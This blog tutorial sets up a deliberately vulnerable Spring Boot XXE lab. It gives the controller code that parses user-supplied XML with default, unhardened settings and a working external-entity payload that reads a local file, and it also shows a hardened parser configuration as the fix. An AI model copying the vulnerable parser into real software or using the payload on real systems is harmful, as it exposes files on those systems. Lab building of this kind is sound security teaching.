Preface:
Following on from the previous post, this one records how the XXE vulnerability lab was built and the key code behind it.
2. Project configuration
Edit application.properties:
spring.thymeleaf.prefix = classpath:/templates/
Import the dependencies in pom.xml:
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.6.4</version>
        <relativePath/>
    </parent>
    <groupId>com.example</groupId>
    <artifactId>XXE_springboot</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <name>XXE_springboot</name>
    <description>XXE_springboot</description>
    <properties>
        <java.version>1.8</java.version>
    </properties>
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-test</artifactId>
            <scope>test</scope>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-thymeleaf</artifactId>
        </dependency>
    </dependencies>
    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>
</project>
3. Writing the back end for the XXE vulnerability
indexController.java: maps the index front page to the index.html template
package com.example.xxe_springboot.controller;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;

@Controller
public class indexController {
    // Both "/" and "/index.html" resolve to the Thymeleaf template templates/index.html
    @RequestMapping(value = {"/", "/index.html"})
    public String index() {
        return "index";
    }
}
The data submitted from index.html is sent to localhost:8080/xxe, so next write the controller that handles the /xxe request.
XxeController.java
package com.example.xxe_springboot.controller;

import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.SAXException;

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;

@RestController
public class XxeController {

    // Deliberately vulnerable: the XML comes straight from the request parameter and is
    // parsed with an unhardened DocumentBuilderFactory, so external entities are resolved.
    @RequestMapping("/xxe")
    public String xxe(@RequestParam(value = "xxe", required = false) String xxe)
            throws ParserConfigurationException, IOException, SAXException {
        /**
         * Parse the XML with a DOM parser
         */
        // Turn the XML text into an input stream so the DOM parser can read it
        // (required = false means a missing parameter arrives as null and fails here; fine for the lab)
        String anyString = xxe;
        InputStream is = new ByteArrayInputStream(anyString.getBytes(StandardCharsets.UTF_8));
        //InputStream is = new FileInputStream("D:\note2.xml");
        // Create the DOM parser factory with all defaults (DOCTYPE and external entities allowed)
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // Obtain a DOM parser from the factory
        DocumentBuilder builder = factory.newDocumentBuilder();
        // parse() builds the Document for the whole XML, expanding any entities on the way
        Document doc = builder.parse(is);
        // Read the value of the <from> element; an external entity referenced there is
        // expanded into the target file's contents
        NodeList nodeList = doc.getElementsByTagName("from");
        System.out.println(nodeList.item(0).getTextContent());
        return "success";
    }
}
After the document is parsed, "success" is returned to the front end and the contents read through the entity are printed to the console, which is enough to confirm the read during testing.
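The security-relevant point in XxeController is that DocumentBuilderFactory.newInstance() ships with DOCTYPE processing and external entity resolution switched on, so any SYSTEM entity in the request is fetched and inlined into the document. The class below is an added example, not part of the original lab: it parses the same shape of payload once with the lab's default factory and once with a hardened factory. The target file is a constructed temporary file standing in for D://XXE.txt so the demo runs on any OS; the class name XxeDemo, the helper names and the file contents are assumptions for the demo.

```java
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;

public class XxeDemo {

    // Same configuration as the lab controller: every default left in place,
    // so DOCTYPE declarations and external entities are honoured.
    static DocumentBuilder vulnerableBuilder() throws ParserConfigurationException {
        return DocumentBuilderFactory.newInstance().newDocumentBuilder();
    }

    // Hardened configuration for the JDK's built-in (Xerces-based) parser.
    // disallow-doctype-decl alone rejects every internal, external and parameter
    // entity; the remaining settings are defence in depth for parsers that lack it.
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    // Mirrors the lab controller: returns the text of <from>, or null if the
    // parser refused the document (which is what the hardened builder does).
    static String extractFrom(DocumentBuilder builder, String xml) throws Exception {
        try {
            Document doc = builder.parse(new InputSource(new StringReader(xml)));
            return doc.getElementsByTagName("from").item(0).getTextContent();
        } catch (SAXParseException e) {
            System.out.println("parser refused document: " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed target file standing in for D://XXE.txt (assumption for the demo).
        Path secret = Files.createTempFile("xxe-demo", ".txt");
        Files.write(secret, "top-secret-flag".getBytes(StandardCharsets.UTF_8));

        // Same payload shape as the lab: an external general entity expanded inside <from>.
        String payload =
            "<!DOCTYPE note [\n" +
            "  <!ENTITY myentity SYSTEM \"" + secret.toUri() + "\">\n" +
            "]>\n" +
            "<note><to>Tove</to><from>&myentity;</from></note>";

        System.out.println("vulnerable: " + extractFrom(vulnerableBuilder(), payload));
        System.out.println("hardened:   " + extractFrom(hardenedBuilder(), payload));

        Files.deleteIfExists(secret);
    }
}
```

Compile and run with `javac XxeDemo.java && java XxeDemo`. The default factory prints the temporary file's contents as the text of `<from>`, reproducing the lab's file read; the hardened factory throws SAXParseException at the DOCTYPE, before any entity is resolved, and extractFrom returns null. Dropping hardenedBuilder() into XxeController in place of the default factory is the fix for the lab once you have finished exploiting it.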
4. Writing the front end for the XXE vulnerability
First add a single input box to the main page for entering the payload. Other scenarios, such as a login page, would work just as well, but for testing a plain input box is enough: the point is not the front end but the back-end implementation and reproducing the vulnerable scenario.
index.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>XXE</title>
</head>
<body>
    <p>This is an XXE vulnerability environment; try to construct a payload that reads D://XXE.txt</p>
    <form action="http://localhost:8080/xxe" method="get">
        payload: <input type="text" name="xxe" />
        <input type="submit" value="go" />
    </form>
</body>
</html>
5. Running the test
Start the project:
Open the main page:
payload (the page rendering swallowed the ENTITY line; it is restored here from the entity name &myentity; and the target D://XXE.txt named above, written as the file URI file:///D:/XXE.txt):
<!DOCTYPE note [
  <!ENTITY myentity SYSTEM "file:///D:/XXE.txt">
]>
<note>
  <to>Tove</to>
  <from>&myentity;</from>
  <heading>Reminder</heading>
  <body>Don't forget me this weekend</body>
</note>
Result:
Feel free to share; when reposting please credit the source: 内存溢出